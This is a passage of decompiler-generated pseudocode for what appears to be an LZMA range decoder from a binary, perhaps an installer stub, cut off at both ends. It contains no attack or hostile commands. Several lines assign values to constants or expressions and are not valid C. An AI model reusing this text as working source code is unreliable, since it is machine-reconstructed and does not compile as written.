                                        											if( *(_t613 - 0x6c) == 0) {
                                        												 *(_t613 - 0x88) = 3;
                                        												goto L170;
                                        											}
                                        											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                        											_t67 = _t613 - 0x70;
                                        											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                        											__eflags =  *_t67;
                                        											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                        											L23:
                                        											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                        											if( *(_t613 - 0x48) != 0) {
                                        												goto L21;
                                        											}
                                        											goto L24;
                                        										case 4:
                                        											L133:
                                        											_t531 =  *_t606;
                                        											_t589 = _t531 & 0x0000ffff;
                                        											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                        											if( *(_t613 - 0xc) >= _t565) {
                                        												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                        												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                        												 *(_t613 - 0x40) = 1;
                                        												_t532 = _t531 - (_t531 >> 5);
                                        												 *_t606 = _t532;
                                        											} else {
                                        												 *(_t613 - 0x10) = _t565;
                                        												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                        												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                        											}
                                        											if( *(_t613 - 0x10) >= 0x1000000) {
                                        												goto L139;
                                        											}
                                        										case 5:
                                        											goto L137;
                                        										case 6:
                                        											__edx = 0;
                                        											__eflags =  *(__ebp - 0x40);
                                        											if( *(__ebp - 0x40) != 0) {
                                        												__eax =  *(__ebp - 4);
                                        												__ecx =  *(__ebp - 0x38);
                                        												 *(__ebp - 0x34) = 1;
                                        												 *(__ebp - 0x84) = 7;
                                        												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                        												while(1) {
                                        													 *(_t613 - 0x54) = _t606;
                                        													goto L133;
                                        												}
                                        											}
                                        											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                        											__esi =  *(__ebp - 0x60);
                                        											__cl = 8;
                                        											__cl = 8 -  *(__ebp - 0x3c);
                                        											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                        											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                        											__ecx =  *(__ebp - 0x3c);
                                        											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                        											__ecx =  *(__ebp - 4);
                                        											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                        											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                        											__eflags =  *(__ebp - 0x38) - 4;
                                        											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                        											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                        											if( *(__ebp - 0x38) >= 4) {
                                        												__eflags =  *(__ebp - 0x38) - 0xa;
                                        												if( *(__ebp - 0x38) >= 0xa) {
                                        													_t98 = __ebp - 0x38;
                                        													 *_t98 =  *(__ebp - 0x38) - 6;
                                        													__eflags =  *_t98;
                                        												} else {
                                        													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                        												}
                                        											} else {
                                        												 *(__ebp - 0x38) = 0;
                                        											}
                                        											__eflags =  *(__ebp - 0x34) - __edx;
                                        											if( *(__ebp - 0x34) == __edx) {
                                        												__ebx = 0;
                                        												__ebx = 1;
                                        												goto L61;
                                        											} else {
                                        												__eax =  *(__ebp - 0x14);
                                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                        												__eflags = __eax -  *(__ebp - 0x74);
                                        												if(__eax >=  *(__ebp - 0x74)) {
                                        													__eax = __eax +  *(__ebp - 0x74);
                                        													__eflags = __eax;
                                        												}
                                        												__ecx =  *(__ebp - 8);
                                        												__ebx = 0;
                                        												__ebx = 1;
                                        												__al =  *((intOrPtr*)(__eax + __ecx));
                                        												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                        												goto L41;
                                        											}
                                        										case 7:
                                        											__eflags =  *(__ebp - 0x40) - 1;
                                        											if( *(__ebp - 0x40) != 1) {
                                        												__eax =  *(__ebp - 0x24);
                                        												 *(__ebp - 0x80) = 0x16;
                                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                        												__eax =  *(__ebp - 0x28);
                                        												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                        												__eax =  *(__ebp - 0x2c);
                                        												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                        												__eax = 0;
                                        												__eflags =  *(__ebp - 0x38) - 7;
                                        												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                        												__al = __al & 0x000000fd;
                                        												__eax = (__eflags >= 0) - 1 + 0xa;
                                        												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                        												__eax =  *(__ebp - 4);
                                        												__eax =  *(__ebp - 4) + 0x664;
                                        												__eflags = __eax;
                                        												 *(__ebp - 0x58) = __eax;
                                        												goto L69;
                                        											}
                                        											__eax =  *(__ebp - 4);
                                        											__ecx =  *(__ebp - 0x38);
                                        											 *(__ebp - 0x84) = 8;
                                        											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                        											while(1) {
                                        												 *(_t613 - 0x54) = _t606;
                                        												goto L133;
                                        											}
                                        										case 8:
                                        											goto L0;
                                        										case 9:
                                        											__eflags =  *(__ebp - 0x40);
                                        											if( *(__ebp - 0x40) != 0) {
                                        												goto L89;
                                        											}
                                        											__eflags =  *(__ebp - 0x60);
                                        											if( *(__ebp - 0x60) == 0) {
                                        												goto L171;
                                        											}
                                        											__eax = 0;
                                        											__eflags =  *(__ebp - 0x38) - 7;
                                        											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                        											__eflags = _t258;
                                        											0 | _t258 = _t258 + _t258 + 9;
                                        											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                        											goto L75;
                                        										case 0xa:
                                        											__eflags =  *(__ebp - 0x40);
                                        											if( *(__ebp - 0x40) != 0) {
                                        												__eax =  *(__ebp - 4);
                                        												__ecx =  *(__ebp - 0x38);
                                        												 *(__ebp - 0x84) = 0xb;
                                        												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                        												while(1) {
                                        													 *(_t613 - 0x54) = _t606;
                                        													goto L133;
                                        												}
                                        											}
                                        											__eax =  *(__ebp - 0x28);
                                        											goto L88;
                                        										case 0xb:
                                        											__eflags =  *(__ebp - 0x40);
                                        											if( *(__ebp - 0x40) != 0) {
                                        												__ecx =  *(__ebp - 0x24);
                                        												__eax =  *(__ebp - 0x20);
                                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                        											} else {
                                        												__eax =  *(__ebp - 0x24);
                                        											}
                                        											__ecx =  *(__ebp - 0x28);
                                        											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                        											L88:
                                        											__ecx =  *(__ebp - 0x2c);
                                        											 *(__ebp - 0x2c) = __eax;
                                        											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                        											L89:
                                        											__eax =  *(__ebp - 4);
                                        											 *(__ebp - 0x80) = 0x15;
                                        											__eax =  *(__ebp - 4) + 0xa68;
                                        											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                        											goto L69;
                                        										case 0xc:
                                        											L99:
                                        											__eflags =  *(__ebp - 0x6c);
                                        											if( *(__ebp - 0x6c) == 0) {
                                        												 *(__ebp - 0x88) = 0xc;
                                        												goto L170;
                                        											}
                                        											__ecx =  *(__ebp - 0x70);
                                        											__eax =  *(__ebp - 0xc);
                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											_t334 = __ebp - 0x70;
                                        											 *_t334 =  *(__ebp - 0x70) + 1;
                                        											__eflags =  *_t334;
                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											__eax =  *(__ebp - 0x2c);
                                        											goto L101;
                                        										case 0xd:
                                        											L37:
                                        											__eflags =  *(__ebp - 0x6c);
                                        											if( *(__ebp - 0x6c) == 0) {
                                        												 *(__ebp - 0x88) = 0xd;
                                        												goto L170;
                                        											}
                                        											__ecx =  *(__ebp - 0x70);
                                        											__eax =  *(__ebp - 0xc);
                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											_t122 = __ebp - 0x70;
                                        											 *_t122 =  *(__ebp - 0x70) + 1;
                                        											__eflags =  *_t122;
                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											L39:
                                        											__eax =  *(__ebp - 0x40);
                                        											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                        											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                        												goto L48;
                                        											}
                                        											__eflags = __ebx - 0x100;
                                        											if(__ebx >= 0x100) {
                                        												goto L54;
                                        											}
                                        											L41:
                                        											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                        											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                        											__ecx =  *(__ebp - 0x58);
                                        											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                        											 *(__ebp - 0x48) = __eax;
                                        											__eax = __eax + 1;
                                        											__eax = __eax << 8;
                                        											__eax = __eax + __ebx;
                                        											__esi =  *(__ebp - 0x58) + __eax * 2;
                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                        											__ax =  *__esi;
                                        											 *(__ebp - 0x54) = __esi;
                                        											__edx = __ax & 0x0000ffff;
                                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                        											__eflags =  *(__ebp - 0xc) - __ecx;
                                        											if( *(__ebp - 0xc) >= __ecx) {
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        												__cx = __ax;
                                        												 *(__ebp - 0x40) = 1;
                                        												__cx = __ax >> 5;
                                        												__eflags = __eax;
                                        												__ebx = __ebx + __ebx + 1;
                                        												 *__esi = __ax;
                                        											} else {
                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                        												 *(__ebp - 0x10) = __ecx;
                                        												0x800 = 0x800 - __edx;
                                        												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                        												__ebx = __ebx + __ebx;
                                        												 *__esi = __cx;
                                        											}
                                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        											 *(__ebp - 0x44) = __ebx;
                                        											if( *(__ebp - 0x10) >= 0x1000000) {
                                        												goto L39;
                                        											} else {
                                        												goto L37;
                                        											}
                                        										case 0xe:
                                        											L46:
                                        											__eflags =  *(__ebp - 0x6c);
                                        											if( *(__ebp - 0x6c) == 0) {
                                        												 *(__ebp - 0x88) = 0xe;
                                        												goto L170;
                                        											}
                                        											__ecx =  *(__ebp - 0x70);
                                        											__eax =  *(__ebp - 0xc);
                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											_t156 = __ebp - 0x70;
                                        											 *_t156 =  *(__ebp - 0x70) + 1;
                                        											__eflags =  *_t156;
                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											while(1) {
                                        												L48:
                                        												__eflags = __ebx - 0x100;
                                        												if(__ebx >= 0x100) {
                                        													break;
                                        												}
                                        												__eax =  *(__ebp - 0x58);
                                        												__edx = __ebx + __ebx;
                                        												__ecx =  *(__ebp - 0x10);
                                        												__esi = __edx + __eax;
                                        												__ecx =  *(__ebp - 0x10) >> 0xb;
                                        												__ax =  *__esi;
                                        												 *(__ebp - 0x54) = __esi;
                                        												__edi = __ax & 0x0000ffff;
                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                        												if( *(__ebp - 0xc) >= __ecx) {
                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        													__cx = __ax;
                                        													_t170 = __edx + 1; // 0x1
                                        													__ebx = _t170;
                                        													__cx = __ax >> 5;
                                        													__eflags = __eax;
                                        													 *__esi = __ax;
                                        												} else {
                                        													 *(__ebp - 0x10) = __ecx;
                                        													0x800 = 0x800 - __edi;
                                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                        													__ebx = __ebx + __ebx;
                                        													 *__esi = __cx;
                                        												}
                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        												 *(__ebp - 0x44) = __ebx;
                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                        													continue;
                                        												} else {
                                        													goto L46;
                                        												}
                                        											}
                                        											L54:
                                        											_t173 = __ebp - 0x34;
                                        											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                        											__eflags =  *_t173;
                                        											goto L55;
                                        										case 0xf:
                                        											L58:
                                        											__eflags =  *(__ebp - 0x6c);
                                        											if( *(__ebp - 0x6c) == 0) {
                                        												 *(__ebp - 0x88) = 0xf;
                                        												goto L170;
                                        											}
                                        											__ecx =  *(__ebp - 0x70);
                                        											__eax =  *(__ebp - 0xc);
                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											_t203 = __ebp - 0x70;
                                        											 *_t203 =  *(__ebp - 0x70) + 1;
                                        											__eflags =  *_t203;
                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											L60:
                                        											__eflags = __ebx - 0x100;
                                        											if(__ebx >= 0x100) {
                                        												L55:
                                        												__al =  *(__ebp - 0x44);
                                        												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                        												goto L56;
                                        											}
                                        											L61:
                                        											__eax =  *(__ebp - 0x58);
                                        											__edx = __ebx + __ebx;
                                        											__ecx =  *(__ebp - 0x10);
                                        											__esi = __edx + __eax;
                                        											__ecx =  *(__ebp - 0x10) >> 0xb;
                                        											__ax =  *__esi;
                                        											 *(__ebp - 0x54) = __esi;
                                        											__edi = __ax & 0x0000ffff;
                                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                        											__eflags =  *(__ebp - 0xc) - __ecx;
                                        											if( *(__ebp - 0xc) >= __ecx) {
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        												__cx = __ax;
                                        												_t217 = __edx + 1; // 0x1
                                        												__ebx = _t217;
                                        												__cx = __ax >> 5;
                                        												__eflags = __eax;
                                        												 *__esi = __ax;
                                        											} else {
                                        												 *(__ebp - 0x10) = __ecx;
                                        												0x800 = 0x800 - __edi;
                                        												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                        												__ebx = __ebx + __ebx;
                                        												 *__esi = __cx;
                                        											}
                                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        											 *(__ebp - 0x44) = __ebx;
                                        											if( *(__ebp - 0x10) >= 0x1000000) {
                                        												goto L60;
                                        											} else {
                                        												goto L58;
                                        											}
                                        										case 0x10:
                                        											L109:
                                        											__eflags =  *(__ebp - 0x6c);
                                        											if( *(__ebp - 0x6c) == 0) {
                                        												 *(__ebp - 0x88) = 0x10;
                                        												goto L170;
                                        											}
                                        											__ecx =  *(__ebp - 0x70);
                                        											__eax =  *(__ebp - 0xc);
                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											_t365 = __ebp - 0x70;
                                        											 *_t365 =  *(__ebp - 0x70) + 1;
                                        											__eflags =  *_t365;
                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											goto L111;
                                        										case 0x11:
                                        											L69:
                                        											__esi =  *(__ebp - 0x58);
                                        											 *(__ebp - 0x84) = 0x12;
                                        											while(1) {
                                        												 *(_t613 - 0x54) = _t606;
                                        												goto L133;
                                        											}
                                        										case 0x12:
                                        											__eflags =  *(__ebp - 0x40);
                                        											if( *(__ebp - 0x40) != 0) {
                                        												__eax =  *(__ebp - 0x58);
                                        												 *(__ebp - 0x84) = 0x13;
                                        												__esi =  *(__ebp - 0x58) + 2;
                                        												while(1) {
                                        													 *(_t613 - 0x54) = _t606;
                                        													goto L133;
                                        												}
                                        											}
                                        											__eax =  *(__ebp - 0x4c);
                                        											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                        											__ecx =  *(__ebp - 0x58);
                                        											__eax =  *(__ebp - 0x4c) << 4;
                                        											__eflags = __eax;
                                        											__eax =  *(__ebp - 0x58) + __eax + 4;
                                        											goto L130;
                                        										case 0x13:
                                        											__eflags =  *(__ebp - 0x40);
                                        											if( *(__ebp - 0x40) != 0) {
                                        												_t469 = __ebp - 0x58;
                                        												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                        												__eflags =  *_t469;
                                        												 *(__ebp - 0x30) = 0x10;
                                        												 *(__ebp - 0x40) = 8;
                                        												L144:
                                        												 *(__ebp - 0x7c) = 0x14;
                                        												goto L145;
                                        											}
                                        											__eax =  *(__ebp - 0x4c);
                                        											__ecx =  *(__ebp - 0x58);
                                        											__eax =  *(__ebp - 0x4c) << 4;
                                        											 *(__ebp - 0x30) = 8;
                                        											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                        											L130:
                                        											 *(__ebp - 0x58) = __eax;
                                        											 *(__ebp - 0x40) = 3;
                                        											goto L144;
                                        										case 0x14:
                                        											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                        											__eax =  *(__ebp - 0x80);
                                        											 *(_t613 - 0x88) = _t533;
                                        											goto L1;
                                        										case 0x15:
                                        											__eax = 0;
                                        											__eflags =  *(__ebp - 0x38) - 7;
                                        											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                        											__al = __al & 0x000000fd;
                                        											__eax = (__eflags >= 0) - 1 + 0xb;
                                        											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                        											goto L120;
                                        										case 0x16:
                                        											__eax =  *(__ebp - 0x30);
                                        											__eflags = __eax - 4;
                                        											if(__eax >= 4) {
                                        												_push(3);
                                        												_pop(__eax);
                                        											}
                                        											__ecx =  *(__ebp - 4);
                                        											 *(__ebp - 0x40) = 6;
                                        											__eax = __eax << 7;
                                        											 *(__ebp - 0x7c) = 0x19;
                                        											 *(__ebp - 0x58) = __eax;
                                        											goto L145;
                                        										case 0x17:
                                        											L145:
                                        											__eax =  *(__ebp - 0x40);
                                        											 *(__ebp - 0x50) = 1;
                                        											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                        											goto L149;
                                        										case 0x18:
                                        											L146:
                                        											__eflags =  *(__ebp - 0x6c);
                                        											if( *(__ebp - 0x6c) == 0) {
                                        												 *(__ebp - 0x88) = 0x18;
                                        												goto L170;
                                        											}
                                        											__ecx =  *(__ebp - 0x70);
                                        											__eax =  *(__ebp - 0xc);
                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											_t484 = __ebp - 0x70;
                                        											 *_t484 =  *(__ebp - 0x70) + 1;
                                        											__eflags =  *_t484;
                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											L148:
                                        											_t487 = __ebp - 0x48;
                                        											 *_t487 =  *(__ebp - 0x48) - 1;
                                        											__eflags =  *_t487;
                                        											L149:
                                        											__eflags =  *(__ebp - 0x48);
                                        											if( *(__ebp - 0x48) <= 0) {
                                        												__ecx =  *(__ebp - 0x40);
                                        												__ebx =  *(__ebp - 0x50);
                                        												0 = 1;
                                        												__eax = 1 << __cl;
                                        												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                        												__eax =  *(__ebp - 0x7c);
                                        												 *(__ebp - 0x44) = __ebx;
                                        												while(1) {
                                        													 *(_t613 - 0x88) = _t533;
                                        													goto L1;
                                        												}
                                        											}
                                        											__eax =  *(__ebp - 0x50);
                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                        											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                        											__eax =  *(__ebp - 0x58);
                                        											__esi = __edx + __eax;
                                        											 *(__ebp - 0x54) = __esi;
                                        											__ax =  *__esi;
                                        											__edi = __ax & 0x0000ffff;
                                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                        											__eflags =  *(__ebp - 0xc) - __ecx;
                                        											if( *(__ebp - 0xc) >= __ecx) {
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        												__cx = __ax;
                                        												__cx = __ax >> 5;
                                        												__eax = __eax - __ecx;
                                        												__edx = __edx + 1;
                                        												__eflags = __edx;
                                        												 *__esi = __ax;
                                        												 *(__ebp - 0x50) = __edx;
                                        											} else {
                                        												 *(__ebp - 0x10) = __ecx;
                                        												0x800 = 0x800 - __edi;
                                        												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                        												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                        												 *__esi = __cx;
                                        											}
                                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        											if( *(__ebp - 0x10) >= 0x1000000) {
                                        												goto L148;
                                        											} else {
                                        												goto L146;
                                        											}
                                        										case 0x19:
                                        											__eflags = __ebx - 4;
                                        											if(__ebx < 4) {
                                        												 *(__ebp - 0x2c) = __ebx;
                                        												L119:
                                        												_t393 = __ebp - 0x2c;
                                        												 *_t393 =  *(__ebp - 0x2c) + 1;
                                        												__eflags =  *_t393;
                                        												L120:
                                        												__eax =  *(__ebp - 0x2c);
                                        												__eflags = __eax;
                                        												if(__eax == 0) {
                                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                        													goto L170;
                                        												}
                                        												__eflags = __eax -  *(__ebp - 0x60);
                                        												if(__eax >  *(__ebp - 0x60)) {
                                        													goto L171;
                                        												}
                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                        												__eax =  *(__ebp - 0x30);
                                        												_t400 = __ebp - 0x60;
                                        												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                        												__eflags =  *_t400;
                                        												goto L123;
                                        											}
                                        											__ecx = __ebx;
                                        											__eax = __ebx;
                                        											__ecx = __ebx >> 1;
                                        											__eax = __ebx & 0x00000001;
                                        											__ecx = (__ebx >> 1) - 1;
                                        											__al = __al | 0x00000002;
                                        											__eax = (__ebx & 0x00000001) << __cl;
                                        											__eflags = __ebx - 0xe;
                                        											 *(__ebp - 0x2c) = __eax;
                                        											if(__ebx >= 0xe) {
                                        												__ebx = 0;
                                        												 *(__ebp - 0x48) = __ecx;
                                        												L102:
                                        												__eflags =  *(__ebp - 0x48);
                                        												if( *(__ebp - 0x48) <= 0) {
                                        													__eax = __eax + __ebx;
                                        													 *(__ebp - 0x40) = 4;
                                        													 *(__ebp - 0x2c) = __eax;
                                        													__eax =  *(__ebp - 4);
                                        													__eax =  *(__ebp - 4) + 0x644;
                                        													__eflags = __eax;
                                        													L108:
                                        													__ebx = 0;
                                        													 *(__ebp - 0x58) = __eax;
                                        													 *(__ebp - 0x50) = 1;
                                        													 *(__ebp - 0x44) = 0;
                                        													 *(__ebp - 0x48) = 0;
                                        													L112:
                                        													__eax =  *(__ebp - 0x40);
                                        													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                        													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                        														_t391 = __ebp - 0x2c;
                                        														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                        														__eflags =  *_t391;
                                        														goto L119;
                                        													}
                                        													__eax =  *(__ebp - 0x50);
                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                        													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                        													__eax =  *(__ebp - 0x58);
                                        													__esi = __edi + __eax;
                                        													 *(__ebp - 0x54) = __esi;
                                        													__ax =  *__esi;
                                        													__ecx = __ax & 0x0000ffff;
                                        													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                        													__eflags =  *(__ebp - 0xc) - __edx;
                                        													if( *(__ebp - 0xc) >= __edx) {
                                        														__ecx = 0;
                                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                        														__ecx = 1;
                                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                        														__ebx = 1;
                                        														__ecx =  *(__ebp - 0x48);
                                        														__ebx = 1 << __cl;
                                        														__ecx = 1 << __cl;
                                        														__ebx =  *(__ebp - 0x44);
                                        														__ebx =  *(__ebp - 0x44) | __ecx;
                                        														__cx = __ax;
                                        														__cx = __ax >> 5;
                                        														__eax = __eax - __ecx;
                                        														__edi = __edi + 1;
                                        														__eflags = __edi;
                                        														 *(__ebp - 0x44) = __ebx;
                                        														 *__esi = __ax;
                                        														 *(__ebp - 0x50) = __edi;
                                        													} else {
                                        														 *(__ebp - 0x10) = __edx;
                                        														0x800 = 0x800 - __ecx;
                                        														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                        														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                        														 *__esi = __dx;
                                        													}
                                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        													if( *(__ebp - 0x10) >= 0x1000000) {
                                        														L111:
                                        														_t368 = __ebp - 0x48;
                                        														 *_t368 =  *(__ebp - 0x48) + 1;
                                        														__eflags =  *_t368;
                                        														goto L112;
                                        													} else {
                                        														goto L109;
                                        													}
                                        												}
                                        												__ecx =  *(__ebp - 0xc);
                                        												__ebx = __ebx + __ebx;
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                        												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                        												 *(__ebp - 0x44) = __ebx;
                                        												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                        													__ecx =  *(__ebp - 0x10);
                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                        													__ebx = __ebx | 0x00000001;
                                        													__eflags = __ebx;
                                        													 *(__ebp - 0x44) = __ebx;
                                        												}
                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                        													L101:
                                        													_t338 = __ebp - 0x48;
                                        													 *_t338 =  *(__ebp - 0x48) - 1;
